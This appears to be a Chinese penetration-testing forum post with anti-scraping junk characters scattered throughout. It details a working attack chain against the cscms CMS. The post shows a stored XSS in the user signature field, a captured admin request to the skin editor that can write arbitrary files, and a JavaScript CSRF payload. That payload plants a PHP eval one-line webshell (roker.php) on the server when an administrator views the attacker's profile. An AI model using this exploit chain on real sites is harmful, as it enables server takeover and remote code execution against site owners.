| 这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题 官网已经修补了,所以重新下了源码 因为 后台登入 还需要认证码 所以 注入就没看了。1 h6 C, h3 J( y2 ~7 g1 s 存在 xss 漏洞文件 user/member/skin_edit.php 本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:$ Z+ R8 j+ E, T% Z% u3 v </span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?> # a, R7 {/ |- J. _& ]: F8 c </textarea></td></tr>+ f! {5 i0 f7 G8 b$ O; e. t0 |) Q z5 U& K1 l$ W( G user/do.php ( @7 Q5 [+ X( f + N3 B- ]* s' m( z4 Y if($op=='zl'){ //资料 8 R! U' T; w L2 ^9 F: H" {. H if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));9 J; ]% @) x2 v6 t6 f: b5 g4 F & o2 R+ H' d: E) U0 p% O: Y $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',% W( y) W6 @) O4 K/ K. ~ + q' T; ~) B# W) ~& } CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'+ R: y1 ?* w. b where CS_Name='".$cscms_name."'"; if($db->query($sql)){ exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));- C' m4 O A# l( P 5 H1 X/ z1 @7 i- J }else{8 L" q3 i, N7 r; ?+ v! W6 ? exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));" t* u4 r. V0 l: \' }+ K 6 d+ N8 G) Y& _( V } 没有 过滤导致xss产生。 后台 看了下 很奇葩的是可以写任意格式文件。。 抓包。。& Y1 x$ \) H& p V' H3 B 6 L% o+ ~; x" X. M 9 r0 F' O* R7 U0 m0 n 本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1, a& C$ M6 K; E+ O x Accept: text/html, application/xhtml+xml, */*. C4 d x" R5 H, u . u. E. B% ]( A! w2 f Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php Accept-Language: zh-CN 5 Y' B$ b+ g1 K8 h1 m User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Content-Type: application/x-www-form-urlencoded. |6 C' k @% j3 g7 r 8 i+ I9 C9 O$ g5 p& `5 g Accept-Encoding: gzip, deflate) F1 D7 k# w1 Z1 O6 J2 A Host: 127.0.0.1 4 L9 \8 k0 V) m' x7 \" K9 c% K7 S6 g* V Content-Length: 388 d! p5 | \1 x) q* k DNT: 1 3 e5 G, A7 x( S9 B Connection: Keep-Alive7 _ a: i5 p; ?* C) l2 W8 P Cache-Control: no-cache Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594 0 N/ ?2 w+ B. H% p* V- J 8 A" M& c$ P5 p# D2 k+ W name=aaa.php&content=%3Cs%3E%3Ca%25%3E+ m# T9 v; T% K3 t& y, h Q* l, o! B- c" q' K & u' a0 _8 L; @% p 于是 构造js如下。 e- r8 m9 Q7 w7 q4 n! e9 s C) z 本帖隐藏的内容<script> thisTHost = top.location.hostname;) ]1 ~+ Y" ~) ?" b0 v1 A: o" W 7 r7 g4 A+ m/ F& |* \+ ~ thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/"; function PostSubmit(url, data, msg) { $ a6 k% y5 ], ?' E var postUrl = url; 2 Q: ]1 _( m+ P var postData = data; var msgData = msg; var ExportForm = document.createElement("FORM"); ! A K. e0 o* `% a! n document.body.appendChild(ExportForm); ExportForm.method = "POST"; 2 x/ Q) F6 t* l0 Q2 n( @5 Y' y var newElement = document.createElement("input"); newElement.setAttribute("name", "name"); newElement.setAttribute("type", "hidden"); 3 ?, p$ c$ H1 C" x0 {2 o var newElement2 = document.createElement("input"); ' S8 w- u4 @6 G5 n: G7 v" M newElement2.setAttribute("name", "content"); newElement2.setAttribute("type", "hidden"); . N* c' u$ _" O1 r ExportForm.appendChild(newElement); ExportForm.appendChild(newElement2); 6 ]- R+ g$ o/ H/ C newElement.value = postData; 3 p& M1 { M9 ~- t- v newElement2.value = msgData; ExportForm.action = postUrl; ExportForm.submit(); & S. u8 D1 |7 } }; , z2 ]" W: ?8 C/ ^ PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>"); 0 y/ s( |3 Z$ H9 z9 a </script>2 x) Z$ o4 u1 A% P& J) u* r 2 P" O ~0 q0 A% R3 t & i6 I9 z) m$ Y5 u # q" w& `) o0 u" ~- e http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入2 i+ I) F. o$ k. Z 用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改) 就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |